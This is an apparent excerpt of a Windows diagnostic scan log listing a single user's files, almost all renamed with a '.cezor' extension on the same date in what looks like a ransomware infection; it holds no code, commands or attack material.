    2019-07-09 15:37 - 2018-07-25 15:27 - 000031186 _____ C:\Users\ADMIN\Downloads\tumblr_static_tumblr_static__640.png.cezor
    2019-07-09 15:37 - 2018-07-21 17:33 - 000373635 _____ C:\Users\ADMIN\Downloads\X (1).pdf.cezor
    2019-07-09 15:37 - 2018-07-19 17:12 - 000000000 ____D C:\Users\ADMIN\Desktop\Warframe
    2019-07-09 15:37 - 2018-07-19 16:52 - 049905742 _____ C:\Users\ADMIN\Downloads\Warframe.msi.cezor
    2019-07-09 15:37 - 2018-07-16 20:40 - 000023756 _____ C:\Users\ADMIN\Downloads\tumblr_or0jh0wSxp1vdvq2wo1_500.jpg.cezor
    2019-07-09 15:37 - 2018-07-16 20:39 - 000005280 _____ C:\Users\ADMIN\Downloads\th.jpg.cezor
    2019-07-09 15:37 - 2018-07-16 20:33 - 001502527 _____ C:\Users\ADMIN\Downloads\tumblr_static_tumblr_static_filename_640.gif.cezor
    2019-07-09 15:37 - 2018-07-16 20:32 - 000421649 _____ C:\Users\ADMIN\Downloads\tumblr_omzv70UUBp1vjst4no4_1280.jpg.cezor
    2019-07-09 15:37 - 2018-07-16 13:29 - 002440817 _____ C:\Users\ADMIN\Downloads\SNsanafonyuV21.zip.cezor
    2019-07-09 15:37 - 2018-07-16 13:10 - 001622503 _____ C:\Users\ADMIN\Downloads\Tooru.(Kobayashi-san.Chi.no.Maid.Dragon).full.2108753.jpg.cezor
    2019-07-09 15:37 - 2018-07-15 17:34 - 000373635 _____ C:\Users\ADMIN\Downloads\X.pdf.cezor
    2019-07-09 15:37 - 2018-05-12 15:41 - 005707239 _____ C:\Users\ADMIN\Downloads\you can be king again.mp3.cezor
    2019-07-09 15:37 - 2018-05-12 15:40 - 005273398 _____ C:\Users\ADMIN\Downloads\[MV] BTS(방탄소년단) _ I NEED U.mp3.cezor
    2019-07-09 15:37 - 2018-02-25 17:20 - 000000235 _____ C:\Users\ADMIN\Downloads\unnamed.png.cezor
    2019-07-09 15:37 - 2018-02-25 17:20 - 000000235 _____ C:\Users\ADMIN\Downloads\unnamed (1).png.cezor
    2019-07-09 15:37 - 2018-02-10 16:47 - 000260945 _____ C:\Users\ADMIN\Downloads\thumb-1920-567359.jpg.cezor
    2019-07-09 15:37 - 2018-02-07 15:51 - 000044420 _____ C:\Users\ADMIN\Downloads\VD0K8Ua.gif.cezor
    2019-07-09 15:37 - 2017-12-09 17:57 - 179236805 _____ C:\Users\ADMIN\Downloads\The.Sims.4.Cats.and.Dogs.v1.36.102.1020.MULTI.17.zip.cezor
    2019-07-09 15:37 - 2017-12-03 19:55 - 000000000 ____D C:\Users\ADMIN\Documents\WolfQuest2
    2019-07-09 15:37 - 2017-12-03 19:39 - 224404558 _____ C:\Users\ADMIN\Downloads\WolfQuest_Win_20111011.msi.cezor
    2019-07-09 15:37 - 2017-12-01 21:52 - 601915294 _____ C:\Users\ADMIN\Downloads\SSF2BetaSetup.v1.0.3.2.exe.cezor
    2019-07-09 15:37 - 2017-11-30 21:58 - 007487920 _____ C:\Users\ADMIN\Downloads\ssfsetup.exe.cezor
    2019-07-09 15:37 - 2017-11-08 18:28 - 000677460 _____ C:\Users\ADMIN\Downloads\TXqeaCLYSWqN0eKeiAIDKw.png.cezor
    2019-07-09 15:37 - 2017-11-08 18:27 - 000750861 _____ C:\Users\ADMIN\Downloads\_5JFIY8NSDO4UowU9jXjNA.png.cezor
    2019-07-09 15:37 - 2017-10-01 22:20 - 000064208 _____ C:\Users\ADMIN\Downloads\yuuu.jpg.cezor
    2019-07-09 15:37 - 2017-09-26 13:47 - 000039123 _____ C:\Users\ADMIN\Downloads\ty.jpg.cezor
    2019-07-09 15:37 - 2017-09-23 19:01 - 000064796 _____ C:\Users\ADMIN\Downloads\YOONGI.jpg.cezor
    2019-07-09 15:37 - 2017-09-23 16:47 - 000007672 _____ C:\Users\ADMIN\Downloads\yuu.jpg.cezor
    2019-07-09 15:37 - 2017-09-23 12:30 - 000013515 _____ C:\Users\ADMIN\Downloads\yhita.jpg.cezor
    2019-07-09 15:37 - 2017-09-22 15:21 - 000009163 _____ C:\Users\ADMIN\Downloads\yo.jpg.cezor
    2019-07-09 15:37 - 2017-09-21 12:28 - 000000530 _____ C:\Users\ADMIN\Downloads\url.htm.cezor
    2019-07-09 15:37 - 2017-07-03 14:15 - 000052498 _____ C:\Users\ADMIN\Downloads\_photo_booth___kageyama_tobio_x_reader__by_bakageyama-d85zton.jpg.cezor
    2019-07-09 15:37 - 2017-04-05 19:10 - 006724536 _____ C:\Users\ADMIN\Downloads\UNIT-1.PDF.cezor
    2019-07-09 15:37 - 2016-12-29 16:19 - 000000000 ____D C:\Users\ADMIN\Downloads\MCLeaksAuthenticator
    2019-07-09 15:37 - 2016-12-12 21:16 - 000079301 _____ C:\Users\ADMIN\Downloads\tumblr_n874e2uZHK1snc5kxo1_1280.gif.cezor
    2019-07-09 15:37 - 2016-12-12 21:08 - 000736050 _____ C:\Users\ADMIN\Downloads\❄️ (@nekoshoyo) _ Twitter.html.cezor
    2019-07-09 15:37 - 2016-12-12 21:08 - 000000000 ____D C:\Users\ADMIN\Downloads\❄️ (@nekoshoyo) _ Twitter_files
    2019-07-09 15:37 - 2016-12-10 13:47 - 008039538 _____ C:\Users\ADMIN\Downloads\Tube Tycoon B1.2.4.zip.cezor
    2019-07-09 15:37 - 2016-11-20 18:39 - 000190960 _____ C:\Users\ADMIN\Downloads\Zen_home.jpg.cezor
    2019-07-09 15:37 - 2016-11-14 13:32 - 000434223 _____ C:\Users\ADMIN\Downloads\tumblr_static_tumblr_static_bc8sx0q9g0g8ggws4ogoskgo4_640.png.cezor
    2019-07-09 15:37 - 2016-11-14 13:32 - 000222743 _____ C:\Users\ADMIN\Downloads\tumblr_o2x5pq7iXm1v8gdx4o1_1280.jpg.cezor
    2019-07-09 15:37 - 2016-11-14 13:29 - 000274940 _____ C:\Users\ADMIN\Downloads\tumblr_n0zvroQjNm1r1p25so1_500.gif.cezor
    2019-07-09 15:37 - 2016-11-01 12:33 - 004231222 _____ C:\Users\ADMIN\Downloads\WoT_internet_install_asia.exe.cezor
    2019-07-09 15:37 - 2016-09-22 18:51 - 000000931 _____ C:\Users\ADMIN\Downloads\ubot (1).user.js.cezor
    2019-07-09 15:37 - 2016-09-22 00:31 - 000000000 ____D C:\Users\ADMIN\Downloads\certs
    2019-07-09 15:37 - 2016-08-30 16:40 - 000000000 ____D C:\Users\ADMIN\Documents\Lightshot
    2019-07-09 15:37 - 2016-08-16 18:14 - 012769817 _____ C:\Users\ADMIN\Downloads\VID-20160813-WA0001.mp4.cezor
    2019-07-09 15:37 - 2016-08-11 14:28 - 000028058 _____ C:\Users\ADMIN\Downloads\tumblr_inline_nmyvkrpSvY1sowzkr_400.jpg.cezor
    2019-07-09 15:37 - 2016-08-04 13:54 - 000000000 ____D C:\Users\ADMIN\Downloads\RIP III
    2019-07-09 15:37 - 2016-07-05 21:34 - 000000000 ____D C:\Users\ADMIN\Downloads\ModernHD 1.9
    2019-07-09 15:37 - 2016-03-26 15:14 - 001226486 _____ C:\Users\ADMIN\Downloads\Suga.full.19352.jpg.cezor
    2019-07-09 15:37 - 2016-03-23 22:15 - 000016593 _____ C:\Users\ADMIN\Downloads\Suga-bts-35194130-500-340.jpg.cezor
    2019-07-09 15:37 - 2016-03-23 22:14 - 004394502 _____ C:\Users\ADMIN\Downloads\WaroftheDjinn.zip.cezor
    2019-07-09 15:37 - 2016-03-22 13:56 - 000126693 _____ C:\Users\ADMIN\Downloads\TrenBW5.png.cezor
    2019-07-09 15:37 - 2016-03-22 13:55 - 000018369 _____ C:\Users\ADMIN\Downloads\tumblr_o3luxkxlWH1v2cstjo1_500.jpg.cezor
    2019-07-09 15:37 - 2016-03-22 13:47 - 000116491 _____ C:\Users\ADMIN\Downloads\xl9ZF2S_burned.png.cezor
    2019-07-09 15:37 - 2016-03-22 13:37 - 000144624 _____ C:\Users\ADMIN\Downloads\xl9ZF2S.png.cezor
    2019-07-09 15:37 - 2016-03-22 13:36 - 000144405 _____ C:\Users\ADMIN\Downloads\YqDF3Ce.png.cezor
    2019-07-09 15:37 - 2016-03-19 22:21 - 000000000 ____D C:\Users\ADMIN\Downloads\Hyper Projection Performance Haikyuu!!
    2019-07-09 15:37 - 2016-03-17 19:52 - 000000000 ____D C:\Users\ADMIN\Documents\Collage Maker Projects
    2019-07-09 15:37 - 2016-03-11 15:30 - 000659875 _____ C:\Users\ADMIN\Downloads\VisualBoyAdvance-1.8.0-beta3.zip.cezor
    2019-07-09 15:37 - 2016-03-11 15:29 - 000365874 _____ C:\Users\ADMIN\Downloads\VisualBoyAdvance-1.2-SDL-Win32-fixed.zip.cezor
    2019-07-09 15:37 - 2016-03-07 15:59 - 000103594 _____ C:\Users\ADMIN\Downloads\yahfie.light.ttf.cezor
    2019-07-09 15:37 - 2016-03-06 15:36 - 000142242 _____ C:\Users\ADMIN\Downloads\tumblr_o0phwu7nbf1tan48fo1_400_burned.png.cezor
    2019-07-09 15:37 - 2016-03-05 13:15 - 000164413 _____ C:\Users\ADMIN\Downloads\VTn3AElm_400x400_burned (3).png.cezor
    2019-07-09 15:37 - 2016-03-05 13:13 - 000164413 _____ C:\Users\ADMIN\Downloads\VTn3AElm_400x400_burned (2).png.cezor
    2019-07-09 15:37 - 2016-03-05 13:12 - 000164413 _____ C:\Users\ADMIN\Downloads\VTn3AElm_400x400_burned (1).png.cezor
    2019-07-09 15:37 - 2016-03-05 13:12 - 000035800 _____ C:\Users\ADMIN\Downloads\VTn3AElm_400x400_burned.jpg.cezor
    2019-07-09 15:37 - 2016-03-02 14:49 - 000164141 _____ C:\Users\ADMIN\Downloads\VTn3AElm_400x400_burned.png.cezor
    2019-07-09 15:37 - 2016-02-07 18:39 - 002789693 _____ C:\Users\ADMIN\Downloads\Snavs - Riot (1).mp3.cezor
    2019-07-09 15:37 - 2016-02-07 18:25 - 002789693 _____ C:\Users\ADMIN\Downloads\Snavs - Riot.mp3.cezor
    2019-07-09 15:37 - 2016-02-03 19:55 - 003657794 _____ C:\Users\ADMIN\Downloads\SunnYz - Victory.mp3.cezor
    2019-07-09 15:37 - 2016-01-31 19:02 - 000112176 _____ C:\Users\ADMIN\Downloads\tumblr_nqa4wn9Yx91uriprdo1_500.jpg.cezor
    2019-07-09 15:37 - 2016-01-31 19:01 - 000422831 _____ C:\Users\ADMIN\Downloads\V4KMRF8.png.cezor
    2019-07-09 15:37 - 2016-01-29 17:13 - 003024536 _____ C:\Users\ADMIN\Downloads\YOUTH - Troye Sivan KARAOKE + BACKING VOCALS + LYRICS.m4a.cezor
    2019-07-09 15:37 - 2016-01-29 17:11 - 003048828 _____ C:\Users\ADMIN\Downloads\YOUTH - Troye Sivan KARAOKE + BACKING VOCALS + LYRICS.mp3.cezor
    2019-07-09 15:37 - 2016-01-29 12:14 - 004656299 _____ C:\Users\ADMIN\Downloads\TheFatRat - Monody (feat. Laura Brehm) (1).mp3.cezor
    2019-07-09 15:37 - 2016-01-29 11:03 - 004656299 _____ C:\Users\ADMIN\Downloads\TheFatRat - Monody (feat. Laura Brehm).mp3.cezor
    2019-07-09 15:37 - 2016-01-28 20:00 - 003394480 _____ C:\Users\ADMIN\Downloads\Venemy - Rescue Me (feat. Car) [NCS Release].mp3.cezor
    2019-07-09 15:37 - 2016-01-24 17:12 - 003939501 _____ C:\Users\ADMIN\Downloads\WALK THE MOON - Shut Up and Dance.mp3.cezor
    2019-07-09 15:37 - 2016-01-24 17:03 - 004107812 _____ C:\Users\ADMIN\Downloads\Taio Cruz - Dynamite.mp3.cezor
    2019-07-09 15:37 - 2016-01-22 09:55 - 004150026 _____ C:\Users\ADMIN\Downloads\Spektrem - Shine (Original Mix).mp3.cezor
    2019-07-09 15:37 - 2016-01-08 10:50 - 004817213 _____ C:\Users\ADMIN\Downloads\T & Sugah x NCT - Stardust (feat. Miyoki) [NCS Release].mp3.cezor
    2019-07-09 15:37 - 2016-01-04 20:17 - 003601790 _____ C:\Users\ADMIN\Downloads\Tobu & Syndec - Dusk [NCS Release].mp3.cezor
    2019-07-09 15:37 - 2015-12-14 21:54 - 000000000 ____D C:\Users\ADMIN\Downloads\Need.for.Speed.Rivals.EN-RU.Repack.by.z10yded
    2019-07-09 15:37 - 2015-12-05 15:20 - 000000000 ____D C:\Users\ADMIN\Downloads\resourcepacks
    2019-07-09 15:37 - 2015-12-05 15:19 - 000000000 ____D C:\Users\ADMIN\Downloads\texturepacks
    2019-07-09 15:37 - 2015-12-04 17:00 - 007088586 _____ C:\Users\ADMIN\Downloads\TallcraftDropper1.9.zip.cezor
    2019-07-09 15:37 - 2015-11-26 20:14 - 000000000 ____D C:\Users\ADMIN\Downloads\[R.G. Mechanics] Need for Speed Rivals
    2019-07-09 15:37 - 2015-11-20 13:00 - 000000328 _____ C:\Users\ADMIN\AppData\LocalLow\rbxcsettings.rbx.cezor
    2019-07-09 15:37 - 2015-11-08 17:31 - 003510675 _____ C:\Users\ADMIN\Downloads\Taylor Swift - I Knew You Were Trouble Lyrics (HD).mp3.cezor
    2019-07-09 15:37 - 2015-11-08 17:31 - 003448137 _____ C:\Users\ADMIN\Downloads\Taylor Swift - We Are Never Ever Getting Back Together.mp3.cezor
    2019-07-09 15:37 - 2015-11-08 17:30 - 003889084 _____ C:\Users\ADMIN\Downloads\Taylor Swift - 22.mp3.cezor
    2019-07-09 15:37 - 2015-11-08 17:30 - 003655581 _____ C:\Users\ADMIN\Downloads\Taylor Swift - You Belong With Me.mp3.cezor
    2019-07-09 15:37 - 2015-11-08 17:29 - 003919855 _____ C:\Users\ADMIN\Downloads\Taylor Swift - Bad Blood ft. Kendrick Lamar.mp3.cezor
    2019-07-09 15:37 - 2015-11-08 17:17 - 003440456 _____ C:\Users\ADMIN\Downloads\Troye Sivan - EASE (Lyric Video) ft. Broods.mp3.cezor
    2019-07-09 15:37 - 2015-11-07 13:58 - 001889382 _____ C:\Users\ADMIN\Downloads\uTorrent.exe.cezor
    2019-07-09 15:37 - 2015-11-07 13:52 - 000000000 ____D C:\Users\ADMIN\AppData\LocalLow\mystarttb
    2019-07-09 15:37 - 2015-11-07 13:50 - 008159518 _____ C:\Users\ADMIN\Downloads\TeamViewer_Setup_en.exe.cezor
    2019-07-09 15:37 - 2015-11-07 13:47 - 029833516 _____ C:\Users\ADMIN\Downloads\vlc-2.2.1-win64.exe.cezor
    2019-07-09 15:37 - 2015-11-07 13:47 - 001964214 _____ C:\Users\ADMIN\Downloads\winrar-x64-53b6.exe.cezor
    2019-07-09 15:37 - 2012-03-05 13:52 - 000000000 ____D C:\Users\ADMIN\Desktop\PokemonEmeraldVersion
    2019-07-09 15:36 - 2019-04-28 18:45 - 000116938 _____ C:\Users\ADMIN\Downloads\mt2.jpg.cezor
    2019-07-09 15:36 - 2019-04-02 10:00 - 000003251 _____ C:\Users\ADMIN\Downloads\Agmaio FREE COINS HACK.user.js.cezor
    2019-07-09 15:36 - 2019-03-19 19:30 - 000052901 _____ C:\Users\ADMIN\Downloads\Pokemon - Emerald Version (U)7.sgm.cezor
    2019-07-09 15:36 - 2019-03-19 19:21 - 000056340 _____ C:\Users\ADMIN\Downloads\Pokemon - Emerald Version (U)6.sgm.cezor
    2019-07-09 15:36 - 2019-03-19 19:14 - 000040661 _____ C:\Users\ADMIN\Downloads\Pokemon - Emerald Version (U)5.sgm.cezor
    2019-07-09 15:36 - 2019-03-19 18:25 - 000054561 _____ C:\Users\ADMIN\Downloads\Pokemon - Emerald Version (U)4.sgm.cezor
    2019-07-09 15:36 - 2019-03-19 18:23 - 000049082 _____ C:\Users\ADMIN\Downloads\Pokemon - Emerald Version (U)3.sgm.cezor
    2019-07-09 15:36 - 2019-03-19 18:14 - 000056686 _____ C:\Users\ADMIN\Downloads\Pokemon - Emerald Version (U)2.sgm.cezor
    2019-07-09 15:36 - 2019-03-17 12:24 - 000048084 _____ C:\Users\ADMIN\Downloads\Pokemon - Emerald Version (U)1.sgm.cezor
    2019-07-09 15:36 - 2019-02-15 21:24 - 000021823 _____ C:\Users\ADMIN\Downloads\Agmaio Macros (7).user.js.cezor
    2019-07-09 15:36 - 2019-02-15 21:23 - 000021823 _____ C:\Users\ADMIN\Downloads\Agmaio Macros (6).user.js.cezor
    2019-07-09 15:36 - 2019-02-15 21:23 - 000021823 _____ C:\Users\ADMIN\Downloads\Agmaio Macros (5).user.js.cezor
    2019-07-09 15:36 - 2019-02-15 21:22 - 000021823 _____ C:\Users\ADMIN\Downloads\Agmaio Macros (4).user.js.cezor
    2019-07-09 15:36 - 2019-02-15 21:18 - 000021823 _____ C:\Users\ADMIN\Downloads\Agmaio Macros (3).user.js.cezor
    2019-07-09 15:36 - 2019-02-15 21:17 - 000021823 _____ C:\Users\ADMIN\Downloads\Agmaio Macros.user.js.cezor
    2019-07-09 15:36 - 2019-02-15 21:17 - 000021823 _____ C:\Users\ADMIN\Downloads\Agmaio Macros (2).user.js.cezor
    2019-07-09 15:36 - 2019-02-15 21:17 - 000021823 _____ C:\Users\ADMIN\Downloads\Agmaio Macros (1).user.js.cezor
    2019-07-09 15:36 - 2019-02-03 21:52 - 000042526 _____ C:\Users\ADMIN\Downloads\Not Technically Lying.txt.cezor
    2019-07-09 15:36 - 2019-02-03 21:51 - 000087871 _____ C:\Users\ADMIN\Downloads\Not Technically Lying.pdf.cezor
    2019-07-09 15:36 - 2019-02-01 22:19 - 000227743 _____ C:\Users\ADMIN\Downloads\Introduction to ZeroSum Anthropology.pdf.cezor
    2019-07-09 15:36 - 2019-02-01 22:19 - 000137452 _____ C:\Users\ADMIN\Downloads\cool story bro.pdf.cezor
    2019-07-09 15:36 - 2019-02-01 22:19 - 000082866 _____ C:\Users\ADMIN\Downloads\gave your smile to me.pdf.cezor
    2019-07-09 15:36 - 2019-01-28 21:30 - 000092733 _____ C:\Users\ADMIN\Downloads\Its Nice to Finally Tweet.txt.cezor
    2019-07-09 15:36 - 2019-01-28 21:30 - 000032738 _____ C:\Users\ADMIN\Downloads\Praise Please.txt.cezor
    2019-07-09 15:36 - 2019-01-28 21:29 - 000209278 _____ C:\Users\ADMIN\Downloads\Its Nice to Finally Tweet.pdf.cezor
    2019-07-09 15:36 - 2019-01-28 21:28 - 000082607 _____ C:\Users\ADMIN\Downloads\Praise Please.pdf.cezor
    2019-07-09 15:36 - 2019-01-28 16:11 - 000788841 _____ C:\Users\ADMIN\Downloads\AutoClicker (1).exe.cezor
    2019-07-09 15:36 - 2019-01-26 21:15 - 000014835 _____ C:\Users\ADMIN\Downloads\lolidk.jpg.cezor
    2019-07-09 15:36 - 2019-01-26 14:54 - 000053967 _____ C:\Users\ADMIN\Downloads\jeon.jpg.cezor
    2019-07-09 15:36 - 2019-01-26 14:53 - 000296143 _____ C:\Users\ADMIN\Downloads\mari.png.cezor
    2019-07-09 15:36 - 2019-01-25 22:33 - 000084855 _____ C:\Users\ADMIN\Downloads\same.txt.cezor
    2019-07-09 15:36 - 2019-01-24 21:38 - 000069525 _____ C:\Users\ADMIN\Downloads\movie_65923_1080p_MPEG2.torrent.cezor
    2019-07-09 15:36 - 2019-01-24 21:32 - 000094152 _____ C:\Users\ADMIN\Downloads\Deeds.pdf.cezor
    2019-07-09 15:36 - 2019-01-24 21:32 - 000041076 _____ C:\Users\ADMIN\Downloads\Deeds.txt.cezor
    2019-07-09 15:36 - 2019-01-24 21:29 - 000124758 _____ C:\Users\ADMIN\Downloads\Fathom Me Out.txt.cezor
    2019-07-09 15:36 - 2019-01-24 21:29 - 000117117 _____ C:\Users\ADMIN\Downloads\Fools of Us All.pdf.cezor
    2019-07-09 15:36 - 2019-01-24 21:29 - 000065467 _____ C:\Users\ADMIN\Downloads\Fools of Us All.txt.cezor
    2019-07-09 15:36 - 2019-01-24 21:28 - 000188332 _____ C:\Users\ADMIN\Downloads\Fathom Me Out.pdf.cezor
    2019-07-09 15:36 - 2019-01-21 21:37 - 005281547 _____ C:\Users\ADMIN\Downloads\IZONE (아이즈원) - 라비앙로즈 (La Vie en Rose) MV.mp3.cezor
    2019-07-09 15:36 - 2019-01-21 21:34 - 000912213 _____ C:\Users\ADMIN\Downloads\A Modern Manservant.pdf.cezor
    2019-07-09 15:36 - 2019-01-21 21:34 - 000646747 _____ C:\Users\ADMIN\Downloads\A Modern Manservant.txt.cezor
    2019-07-09 15:36 - 2019-01-20 20:49 - 000171599 _____ C:\Users\ADMIN\Downloads\Dying to Return.pdf.cezor
    2019-07-09 15:36 - 2019-01-20 20:49 - 000115934 _____ C:\Users\ADMIN\Downloads\Dying to Return.txt.cezor
    2019-07-09 15:36 - 2019-01-18 15:59 - 000063845 _____ C:\Users\ADMIN\Downloads\Saved by Hufflepuff Friendship.txt.cezor
    2019-07-09 15:36 - 2019-01-18 15:57 - 000211666 _____ C:\Users\ADMIN\Downloads\Saved by Hufflepuff Friendship.pdf.cezor
    2019-07-09 15:36 - 2019-01-18 15:35 - 000131150 _____ C:\Users\ADMIN\Downloads\Pokemon - Emerald Version (U).sav.cezor
    2019-07-09 15:36 - 2019-01-18 15:20 - 000131150 _____ C:\Users\ADMIN\Downloads\1649 - Pokemon Emerald (J)(Independent).sav.cezor
    2019-07-09 15:36 - 2019-01-16 22:09 - 000365956 _____ C:\Users\ADMIN\Downloads\Police Dog.pdf.cezor
    2019-07-09 15:36 - 2019-01-16 22:09 - 000212460 _____ C:\Users\ADMIN\Downloads\Police Dog.txt.cezor
    2019-07-09 15:36 - 2019-01-16 22:05 - 000044978 _____ C:\Users\ADMIN\Downloads\dj.txt.cezor
    2019-07-09 15:36 - 2019-01-16 22:04 - 000119435 _____ C:\Users\ADMIN\Downloads\dj.pdf.cezor
    2019-07-09 15:36 - 2019-01-16 13:26 - 000227483 _____ C:\Users\ADMIN\Downloads\5 1.pdf.cezor
    2019-07-09 15:36 - 2019-01-16 13:26 - 000141421 _____ C:\Users\ADMIN\Downloads\5 1.txt.cezor
    2019-07-09 15:36 - 2019-01-15 21:33 - 005416966 _____ C:\Users\ADMIN\Downloads\G-DRAGON - 삐딱하게(CROOKED) MV.mp3.cezor
    2019-07-09 15:36 - 2019-01-15 21:32 - 005477153 _____ C:\Users\ADMIN\Downloads\G-DRAGON - 무제(無題) (Untitled 2014) MV.mp3.cezor
    2019-07-09 15:36 - 2019-01-15 19:45 - 000041904 _____ C:\Users\ADMIN\Downloads\potato.png.cezor
    2019-07-09 15:36 - 2019-01-14 21:01 - 000093427 _____ C:\Users\ADMIN\Downloads\anytime anyplace im thinking.pdf.cezor
    2019-07-09 15:36 - 2019-01-14 21:01 - 000044605 _____ C:\Users\ADMIN\Downloads\anytime anyplace im thinking.txt.cezor
    2019-07-09 15:36 - 2019-01-14 14:57 - 000119356 _____ C:\Users\ADMIN\Downloads\Biting Habit.pdf.cezor
    2019-07-09 15:36 - 2019-01-13 22:35 - 000203353 _____ C:\Users\ADMIN\Downloads\falling a photo essay by.pdf.cezor
    2019-07-09 15:36 - 2019-01-13 22:35 - 000116628 _____ C:\Users\ADMIN\Downloads\falling a photo essay by.txt.cezor
    2019-07-09 15:36 - 2019-01-13 22:31 - 000829028 _____ C:\Users\ADMIN\Downloads\G-DRAGON - '무제(無題) (Untitled, 2014)' MV.mp3.cezor
    2019-07-09 15:36 - 2019-01-13 20:00 - 000114944 _____ C:\Users\ADMIN\Downloads\ext-prod_n (1).zip.cezor
    2019-07-09 15:36 - 2019-01-13 19:57 - 000114944 _____ C:\Users\ADMIN\Downloads\ext-prod_n.zip.cezor
    2019-07-09 15:36 - 2019-01-13 13:47 - 000788841 _____ C:\Users\ADMIN\Downloads\AutoClicker.exe.cezor
    2019-07-09 15:36 - 2019-01-11 17:12 - 000302732 _____ C:\Users\ADMIN\Downloads\Dermis.pdf.cezor
    2019-07-09 15:36 - 2019-01-11 17:12 - 000188669 _____ C:\Users\ADMIN\Downloads\Dermis.txt.cezor
    2019-07-09 15:36 - 2019-01-09 21:47 - 003453692 _____ C:\Users\ADMIN\Downloads\robloxapp-20190109-2132031 (1).wmv.cezor
    2019-07-09 15:36 - 2019-01-09 21:34 - 003453692 _____ C:\Users\ADMIN\Downloads\robloxapp-20190109-2132031.wmv.cezor
    2019-07-09 15:36 - 2019-01-08 21:44 - 000946034 _____ C:\Users\ADMIN\Downloads\Deluge.pdf.cezor
    2019-07-09 15:36 - 2019-01-08 21:44 - 000583734 _____ C:\Users\ADMIN\Downloads\Deluge.txt.cezor
    2019-07-09 15:36 - 2019-01-06 21:33 - 001137507 _____ C:\Users\ADMIN\Downloads\Setup_TheFastestMouseClicker_2_1_3_7.exe.cezor
    2019-07-09 15:36 - 2019-01-06 16:22 - 000001392 _____ C:\Users\ADMIN\Downloads\lolid.jpg.cezor
    2019-07-09 15:36 - 2019-01-05 12:48 - 000046485 _____ C:\Users\ADMIN\Downloads\mom.jpg.cezor
    2019-07-09 15:36 - 2019-01-03 22:02 - 005619467 _____ C:\Users\ADMIN\Downloads\AJR - I'm Ready [Official Music Video].mp3.cezor
    2019-07-09 15:36 - 2019-01-03 22:01 - 005783098 _____ C:\Users\ADMIN\Downloads\EDEN - End Credits (feat. Leah Kelly).mp3.cezor
    2019-07-09 15:36 - 2019-01-02 21:40 - 005153024 _____ C:\Users\ADMIN\Downloads\EDEN - fumes (feat. gnash) (official audio).mp3.cezor
    2019-07-09 15:36 - 2019-01-02 21:39 - 007520345 _____ C:\Users\ADMIN\Downloads\EDEN - rock roll (official video).mp3.cezor
    2019-07-09 15:36 - 2019-01-02 21:38 - 000668777 _____ C:\Users\ADMIN\Downloads\Dissonance.txt.cezor
    2019-07-09 15:36 - 2019-01-02 21:36 - 001083259 _____ C:\Users\ADMIN\Downloads\Dissonance.pdf.cezor
    2019-07-09 15:36 - 2018-12-30 22:46 - 004227663 _____ C:\Users\ADMIN\Downloads\Demons - Imagine Dragons.mp3.cezor
    2019-07-09 15:36 - 2018-12-30 22:43 - 005452074 _____ C:\Users\ADMIN\Downloads\Forest Fires - Lauren Aquilina LYRICS.mp3.cezor
    2019-07-09 15:36 - 2018-12-30 16:23 - 000010007 _____ C:\Users\ADMIN\Downloads\faze.png.cezor
    2019-07-09 15:36 - 2018-12-30 16:11 - 017739726 _____ C:\Users\ADMIN\Downloads\bandicam.exe.cezor
    2019-07-09 15:36 - 2018-12-23 22:20 - 004482827 _____ C:\Users\ADMIN\Downloads\I Write Sins Not Tragedies With Lyrics.mp3.cezor
    2019-07-09 15:36 - 2018-12-23 22:18 - 005258350 _____ C:\Users\ADMIN\Downloads\Panic! At The Disco Emperor's New Clothes [OFFICIAL VIDEO].mp3.cezor
    2019-07-09 15:36 - 2018-12-23 22:17 - 006057070 _____ C:\Users\ADMIN\Downloads\Fun. We Are Young ft. Janelle Monáe [OFFICIAL VIDEO].mp3.cezor
    2019-07-09 15:36 - 2018-12-22 16:17 - 000509227 _____ C:\Users\ADMIN\Downloads\Patron Saint.pdf.cezor
    2019-07-09 15:36 - 2018-12-22 16:17 - 000343026 _____ C:\Users\ADMIN\Downloads\Patron Saint.txt.cezor
    2019-07-09 15:36 - 2018-12-18 21:43 - 000376769 _____ C:\Users\ADMIN\Downloads\A Fighting Chance.txt.cezor
    2019-07-09 15:36 - 2018-12-18 21:43 - 000042543 _____ C:\Users\ADMIN\Downloads\Shelter From Cold.txt.cezor
    2019-07-09 15:36 - 2018-12-18 21:42 - 000102691 _____ C:\Users\ADMIN\Downloads\Shelter From Cold.pdf.cezor
    2019-07-09 15:36 - 2018-12-18 21:40 - 000615815 _____ C:\Users\ADMIN\Downloads\A Fighting Chance.pdf.cezor
    2019-07-09 15:36 - 2018-12-15 23:03 - 000224305 _____ C:\Users\ADMIN\Downloads\And the Oscar goes to.pdf.cezor
    2019-07-09 15:36 - 2018-12-15 23:03 - 000126148 _____ C:\Users\ADMIN\Downloads\And the Oscar goes to.txt.cezor
    2019-07-09 15:36 - 2018-12-13 21:19 - 000253847 _____ C:\Users\ADMIN\Downloads\Setting Fire to a Stone.txt.cezor
    2019-07-09 15:36 - 2018-12-13 21:18 - 000375088 _____ C:\Users\ADMIN\Downloads\Setting Fire to a Stone.pdf.cezor
    2019-07-09 15:36 - 2018-12-12 23:10 - 000342867 _____ C:\Users\ADMIN\Downloads\Petey and Wade discuss the.pdf.cezor
    2019-07-09 15:36 - 2018-12-12 23:10 - 000204080 _____ C:\Users\ADMIN\Downloads\Petey and Wade discuss the.txt.cezor
    2019-07-09 15:36 - 2018-12-11 21:23 - 000178047 _____ C:\Users\ADMIN\Downloads\I Think I Missed a Step Cause.txt.cezor
    2019-07-09 15:36 - 2018-12-11 21:23 - 000123538 _____ C:\Users\ADMIN\Downloads\Said the Fly to the Spider.txt.cezor
    2019-07-09 15:36 - 2018-12-11 21:22 - 000211909 _____ C:\Users\ADMIN\Downloads\Said the Fly to the Spider.pdf.cezor
    2019-07-09 15:36 - 2018-12-10 20:41 - 005555519 _____ C:\Users\ADMIN\Downloads\Martin Garrix - Scared To Be Lonely (Lyrics Video) feat. Dua Lipa.mp3.cezor
    2019-07-09 15:36 - 2018-12-10 20:36 - 004931715 _____ C:\Users\ADMIN\Downloads\AJR - Weak (Lyrics) HQ.mp3.cezor
    2019-07-09 15:36 - 2018-12-10 20:10 - 000307753 _____ C:\Users\ADMIN\Downloads\I Think I Missed a Step Cause.pdf.cezor
    2019-07-09 15:36 - 2018-12-10 20:06 - 000120964 _____ C:\Users\ADMIN\Downloads\are you sure you wanna love.pdf.cezor
    2019-07-09 15:36 - 2018-12-09 22:12 - 001509096 _____ C:\Users\ADMIN\Downloads\Holding On.pdf.cezor
